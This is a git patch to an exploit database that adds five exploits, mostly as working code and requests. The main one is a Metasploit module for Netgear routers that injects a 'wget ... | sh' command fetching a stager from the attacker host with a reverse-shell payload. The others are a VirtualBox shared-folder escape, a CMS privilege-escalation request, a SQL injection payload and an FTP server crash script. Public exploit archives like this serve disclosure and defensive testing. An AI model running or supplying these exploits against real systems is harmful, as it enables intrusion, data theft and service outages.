From 8359f0a6a28fa175bd3a8aafe1d44ea374bb1b6c Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 14 Mar 2017 05:01:18 +0000 Subject: [PATCH] DB: 2017-03-14 5 new exploits Cerberus FTP Server 8.0.10.1 - Denial of Service VirtualBox - Cooperating VMs can Escape from Shared Folder Netgear R7000 and R6400 - cgi-bin Command Injection (Metasploit) Car Workshop System - SQL Injection Fiyo CMS 2.0.6.1 - Privilege Escalation --- files.csv | 5 ++ platforms/cgi/remote/41598.rb | 104 ++++++++++++++++++++++++++++ platforms/lin_x86/shellcode/41403.c | 2 +- platforms/linux/local/41597.txt | 55 +++++++++++++++ platforms/php/webapps/41594.txt | 76 ++++++++++++++++++++ platforms/php/webapps/41595.txt | 26 +++++++ platforms/win_x86/shellcode/41467.c | 2 +- platforms/windows/dos/41596.py | 46 ++++++++++++ 8 files changed, 314 insertions(+), 2 deletions(-) create mode 100755 platforms/cgi/remote/41598.rb create mode 100755 platforms/linux/local/41597.txt create mode 100755 platforms/php/webapps/41594.txt create mode 100755 platforms/php/webapps/41595.txt create mode 100755 platforms/windows/dos/41596.py diff --git a/files.csv b/files.csv index 6c7a98050..910da06d3 100644 --- a/files.csv +++ b/files.csv @@ -5389,6 +5389,7 @@ id,file,description,date,author,platform,type,port 41537,platforms/hardware/dos/41537.py,"Conext ComBox 865-1058 - Denial of Service",2017-03-02,"Mark Liapustin and Arik Kublanov",hardware,dos,0 41547,platforms/windows/dos/41547.py,"Evostream Media Server 1.7.1 (x64) - Denial of Service",2017-03-07,"Peter Baris",windows,dos,0 41565,platforms/hardware/dos/41565.py,"Livebox 3 Sagemcom SG30_sip-fr-5.15.8.1 - Denial of Service",2017-03-09,"Quentin Olagne",hardware,dos,0 +41596,platforms/windows/dos/41596.py,"Cerberus FTP Server 8.0.10.1 - Denial of Service",2017-03-13,"Peter Baris",windows,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -8828,6 +8829,7 @@ id,file,description,date,author,platform,type,port 41476,platforms/windows/local/41476.txt,"Cisco AnyConnect Secure Mobility Client 4.3.04027 - Privilege Escalation",2017-02-28,Pcchillin,windows,local,0 41538,platforms/windows/local/41538.cs,"CyberGhost 6.0.4.2205 - Privilege Escalation",2017-03-06,"Kacper Szurek",windows,local,0 41542,platforms/windows/local/41542.c,"USBPcap - Privilege Escalation",2017-03-07,"Parvez Anwar",windows,local,0 +41597,platforms/linux/local/41597.txt,"VirtualBox - Cooperating VMs can Escape from Shared Folder",2017-03-13,"Google Security Research",linux,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -15314,6 +15316,7 @@ id,file,description,date,author,platform,type,port 41511,platforms/windows/remote/41511.py,"FTPShell Client 6.53 - Buffer Overflow",2017-03-04,"Peter Baris",windows,remote,0 41545,platforms/windows/remote/41545.py,"Azure Data Expert Ultimate 2.2.16 - Buffer Overflow",2017-03-07,"Peter Baris",windows,remote,0 41592,platforms/windows/remote/41592.txt,"MobaXterm Personal Edition 9.4 - Directory Traversal",2017-03-11,hyp3rlinx,windows,remote,0 +41598,platforms/cgi/remote/41598.rb,"Netgear R7000 and R6400 - cgi-bin Command Injection (Metasploit)",2017-03-13,Metasploit,cgi,remote,80 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -37360,6 +37363,7 @@ id,file,description,date,author,platform,type,port 41400,platforms/php/webapps/41400.txt,"Joomla! Component PayPal IPN for DOCman 3.1 - 'id' Parameter SQL Injection",2017-02-20,"Ihsan Sencan",php,webapps,0 41401,platforms/ios/webapps/41401.txt,"Album Lock 4.0 iOS - Directory Traversal",2017-02-20,Vulnerability-Lab,ios,webapps,0 41402,platforms/hardware/webapps/41402.txt,"Tenda N3 Wireless N150 Home Router - Authentication Bypass",2015-09-03,"Mandeep Jadon",hardware,webapps,0 +41595,platforms/php/webapps/41595.txt,"Car Workshop System - SQL Injection",2017-03-13,"Ihsan Sencan",php,webapps,0 41404,platforms/hardware/webapps/41404.html,"DIGISOL DG-HR1400 Wireless Router - Cross-Site Request Forgery",2017-02-21,Indrajith.A.N,hardware,webapps,0 41405,platforms/php/webapps/41405.txt,"Joomla! Component J-HotelPortal 6.0.2 - 'review_id' Parameter SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0 41406,platforms/php/webapps/41406.txt,"Joomla! Component J-CruiseReservation Standard 3.0 - 'city' Parameter SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0 @@ -37507,3 +37511,4 @@ id,file,description,date,author,platform,type,port 41589,platforms/php/webapps/41589.txt,"Yacht Listing Script 2.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0 41590,platforms/php/webapps/41590.txt,"Yellow Pages Script 3.2 - 'category_id' Parameter SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0 41591,platforms/php/webapps/41591.txt,"PHP Forum Script 3.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0 +41594,platforms/php/webapps/41594.txt,"Fiyo CMS 2.0.6.1 - Privilege Escalation",2017-03-11,rungga_reksya,php,webapps,0 diff --git a/platforms/cgi/remote/41598.rb b/platforms/cgi/remote/41598.rb new file mode 100755 index 000000000..ad9737db9 --- /dev/null +++ b/platforms/cgi/remote/41598.rb @@ -0,0 +1,104 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => "Netgear R7000 and R6400 cgi-bin Command Injection", + 'Description' => %q{ + This module exploits an arbitrary command injection vulnerability in + Netgear R7000 and R6400 router firmware version 1.0.7.2_1.1.93 and possibly earlier. + }, + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Author' => ['thecarterb', 'Acew0rm'], + 'DefaultTarget' => 0, + 'Privileged' => true, + 'Arch' => ARCH_ARMLE, + 'Targets' => [ + [ 'Automatic Target', { } ] + ], + 'References' => + [ + [ 'EDB', '40889'], + [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=305'], + [ 'URL', 'https://www.kb.cert.org/vuls/id/582384'], + [ 'URL', 'http://kb.netgear.com/000036386/CVE-2016-582384'], + [ 'CVE', '2016-6277'] + ], + 'DisclosureDate' => 'Dec 06 2016', + 'DefaultOptions' => + { + 'PAYLOAD' => 'linux/armle/mettle_reverse_tcp' + } + )) + + register_options( + [ + Opt::RPORT(80) + ], self.class) + + deregister_options('URIPATH') + end + + def scrape(text, start_trig, end_trig) + text[/#{start_trig}(.*?)#{end_trig}/m, 1] + end + + # Requests the login page which discloses the hardware, if it's an R7000 or R6400, return Detected + def check + res = send_request_cgi({'uri'=>'/'}) + if res.nil? + fail_with(Failure::Unreachable, 'Connection timed out.') + end + # Checks for the `WWW-Authenticate` header in the response + if res.headers["WWW-Authenticate"] + data = res.to_s + marker_one = "Basic realm=\"NETGEAR " + marker_two = "\"" + model = scrape(data, marker_one, marker_two) + vprint_status("Router is a NETGEAR router (#{model})") + if model == 'R7000' || model == 'R6400' + print_good("Router may be vulnerable (NETGEAR #{model})") + return CheckCode::Detected + else + return CheckCode::Safe + end + else + print_error('Router is not a NETGEAR router') + return CheckCode::Safe + end + end + + def exploit + return if check == CheckCode::Safe + + @cmdstager = generate_cmdstager(flavor: :wget, 'Path' => '/').join(';') + + send_request_cgi( + 'method' => 'GET', + 'uri' => "/cgi-bin/;wget$IFS-O-$IFS'#{srvhost_addr}:#{srvport}'|sh" + ) + end + + # Return CmdStager on first request, payload on second + def on_request_uri(cli, request) + if @cmdstager + send_response(cli, @cmdstager) + @cmdstager = nil + else + super + end + end + +end \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/41403.c b/platforms/lin_x86/shellcode/41403.c index 032587d2a..6690a4645 100755 --- a/platforms/lin_x86/shellcode/41403.c +++ b/platforms/lin_x86/shellcode/41403.c @@ -1,6 +1,6 @@ # Title: x86 SELinux change between permissive and enforcing modes shellcode # Date: 20-02-2017 -# Author: Krzysztof Przybylski +# Author: lu0xheap # Platform: Lin_x86 # Tested on: CentOS 6.8 (i686) # Shellcode Size: 45 bytes diff --git a/platforms/linux/local/41597.txt b/platforms/linux/local/41597.txt new file mode 100755 index 000000000..ad51461b7 --- /dev/null +++ b/platforms/linux/local/41597.txt @@ -0,0 +1,55 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1037 + +There is a security issue in the shared folder implementation that +permits cooperating guests with write access to the same shared folder to +gain access to the whole filesystem of the host, at least on Linux hosts. + +The issue is that, when the host checks whether a given path escapes the root +directory of the shared folder in vbsfPathCheckRootEscape(), the function +assumes that the directory hierarchy is static: E.g. the path +"base/a/b/c/../../.." is assumed to be equivalent to "base/a/b/../..", +"base/a/.." and "base". However, at least on Linux, renames can occur at the +same time as path traversal. + +This means that, if VM A attempts to open "base/a/b/c/../../../foo" while +VM B is moving "base/a/b/c" to "base/c_", VM A might actually end up opening +"base/../../foo" instead of "base/foo". + +To demonstrate the issue, on a Linux host with Virtualbox 5.1.10: + + - Place a file called "real_root_marker" in the root directory of the Linux + host, containing some secret text. The VMs will attempt to obtain + the contents of this file. + + root@host:/# echo "this is secret text in the host fs" > /real_root_marker + + - Create two Linux VMs with a shared writable folder. + - In the VMs, install the guest extensions, with the attached patch + vboxsf_new.patch applied. + - In the VMs, ensure that the new vboxsf kernel module is loaded and that + the shared folder is mounted. + - In VM A, compile and run the attached file openspam.c: + + root@vmA:/media/sf_vboxshared# gcc -o openspam openspam.c -std=gnu99 + root@vmA:/media/sf_vboxshared# ./openspam + entering directory... + entered directory and prepared folders, racing... + + - In VM B, compile and run the attached file renamespam.c: + + root@vmB:/media/sf_vboxshared# gcc -o renamespam renamespam.c -std=gnu99 + root@vmB:/media/sf_vboxshared# ./renamespam + +Now, in VM A, you should see the contents of the host's /real_root_marker +within seconds: + + SUCCESS + this is secret text in the host fs + EOF + +Note: The exploit assumes that the shared folder isn't more than nine levels +away from the filesystem root. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41597.zip diff --git a/platforms/php/webapps/41594.txt b/platforms/php/webapps/41594.txt new file mode 100755 index 000000000..feceef4e4 --- /dev/null +++ b/platforms/php/webapps/41594.txt @@ -0,0 +1,76 @@ +# Exploit Title: Fiyo CMS 2.0.6.1 allows remote authenticated users to gain privileges via a modified level parameter +# Google Dork: no +# Date: 11-03-2017 +# Exploit Author: @rungga_reksya, @dvnrcy +# Vendor Homepage: http://www.fiyo.org +# Software Link: https://sourceforge.net/projects/fiyo-cms +# Version: 2.0.6.1 +# Tested on: Windows Server 2012 Datacenter Evaluation +# CVE : CVE-2017-6823 + +I. Background: +Fiyo CMS di kembangkan dan dibuat pertama kali oleh mantan seorang pelajar SMK yang pada saat itu bersekolah di SMK 10 Semarang jurusan RPL. Pada zaman itu namanya bukan Fiyo CMS melainkan Sirion yang merupakan akronim dari Site Administration. + +II. Description: +Privilege Escalation (Manipulation of User Group) Vulnerability on Fiyo CMS 2.0.6.1 + +III. Exploit: +Fiyo CMS have five user group (super administrator, administrator, editor, publisher, member) and only three group can access backend page of admin (super administrator, administrator and editor). + +If we login as super administrator and access edit profile menu, check source code (ctrl+u) from your browser and we get level privilege: +super administrator = 1 +administrator = 2 +editor = 3 +publisher = 4 +member = 5 + +Ok, prepare your tool like burpsuite to intercept traffic. in this case I login as editor and I want manipulation of editor group (level=3) to be super administrator group (level=1).  The first you access on menu “Edit Profile” and click “Simpan (Save)”, and then change like this on your burpsuite intercept menu: + +Original: + +POST /fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3 HTTP/1.1 +Host: 192.168.1.2 +User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.1.2/fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3 +Cookie: c40cded1c770e0ead20a6bcbf9a26edf=hplreme8us3iem3jg36km36ob5; PHPSESSID=dcj4n83jd2tdrjs32fo6gm9eq7 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 134 + +edit=Next&id=3&z=editor&user=editor&z=editor&x=&password=editor&kpassword=editor&email=editor%40localhost.com&level=3&name=editor&bio= + + +Manipulation (Change Level=3 to be Level=1): + +POST /fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3 HTTP/1.1 +Host: 192.168.1.2 +User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.1.2/fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3 +Cookie: c40cded1c770e0ead20a6bcbf9a26edf=hplreme8us3iem3jg36km36ob5; PHPSESSID=dcj4n83jd2tdrjs32fo6gm9eq7 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 134 + +edit=Next&id=3&z=editor&user=editor&z=editor&x=&password=editor&kpassword=editor&email=editor%40localhost.com&level=1&name=editor&bio= + +Yeaaah, now editor become super administrator privilege ^_^ and The level of administrator can be super administrator too. + + +IV. Thanks to: +- Alloh SWT +- MyBoboboy +- MII CAS +- Komunitas IT Auditor & IT Security Kaskus + + +Refer: +https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003) + + + diff --git a/platforms/php/webapps/41595.txt b/platforms/php/webapps/41595.txt new file mode 100755 index 000000000..bb847d242 --- /dev/null +++ b/platforms/php/webapps/41595.txt @@ -0,0 +1,26 @@ +# # # # # +# Exploit Title: Car Workshop System - SQL Injection +# Google Dork: N/A +# Date: 13.03.2017 +# Vendor Homepage: http://prosoft-apps.com/ +# Software: https://codecanyon.net/item/car-workshop-system/19562074 +# Demo: http://workshop.prosoft-apps.com/ +# Version: N/A +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail: ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/services/print_service_invoice?job_id=[SQL] +# 6'+/*!50000union*/+select+1,2,3,/*!50000concat*/(database(),0x7e,version()),5,6,7,8,9,10,11,12--+- +# +# In addition. +# Technician User, There are security vulnerabilities. +# purchase_order/deletePO?id= +# technician_services/tech_opened_services_view?job_id= +# technician_services/tech_drew_out_inventory_services_view?job_id= +# technician_services/tech_completed_services_view?job_id= +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/win_x86/shellcode/41467.c b/platforms/win_x86/shellcode/41467.c index 40359279d..9f170e84c 100755 --- a/platforms/win_x86/shellcode/41467.c +++ b/platforms/win_x86/shellcode/41467.c @@ -1,6 +1,6 @@ # Title: Windows x86 - Executable directory search Shellcode (130 bytes) # Date: 26-02-2017 -# Author: Krzysztof Przybylski +# Author: lu0xheap # Platform: Win_x86 # Tested on: WinXP SP1 # Shellcode Size: 130 bytes diff --git a/platforms/windows/dos/41596.py b/platforms/windows/dos/41596.py new file mode 100755 index 000000000..76b152cf1 --- /dev/null +++ b/platforms/windows/dos/41596.py @@ -0,0 +1,46 @@ +# Exploit Title: Cerberus FTP server – Denial of Service +# Date: 2017-03-13 +# Exploit Author: Peter Baris +# Vendor Homepage: https://www.cerberusftp.com/ +# Software Link: [download link if available] +# Version: 8.0.10.1 +# Tested on: Windows Server 2008 R2 Standard x64, Windows 7 Pro SP1 x64 +# CVE : CVE-2017-6367 + +# 2017-02-27: Vulnerability discovered, Contact to Cerberus Support +# 2017-02-27: Reply received, PoC exploit code sent +# 2017-02-27: Problematic module identified by the vendor, gSOAP +# 2017-03-02: New version 8.0.10.2 released - https://www.cerberusftp.com/products/releasenotes/ +# 2017-03-02: gSOAP module update released by the vendor and advisory placed https://www.genivia.com/advisory.html +# 2017-03-02: grace period until 13th March +# 2017-03-13: Publishing + +import socket +import sys + +try: + host = sys.argv[1] + port = 10001 +except IndexError: + print "[+] Usage %s " % sys.argv[0] + sys.exit() + + +exploit = "A"*5004 + +buffer = "GET /index.html HTTP/1.1\r\n" +buffer+= "Host: "+exploit+host+":"+str(port)+"\r\n" +buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n" +buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\ +r\n" +buffer+="Accept-Language: en-US,en;q=0.5\r\n" +buffer+="Accept-Encoding: gzip, deflate\r\n" +buffer+="Referer: "+host+":"+str(port)+"\r\n" +buffer+="Connection: keep-alive\r\n" +buffer+="Content-Type: application/x-www-form-urlencoded\r\n" +buffer+="Content-Length: 5900\r\n\r\n" + +s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) +connect=s.connect((host,port)) +s.send(buffer) +s.close()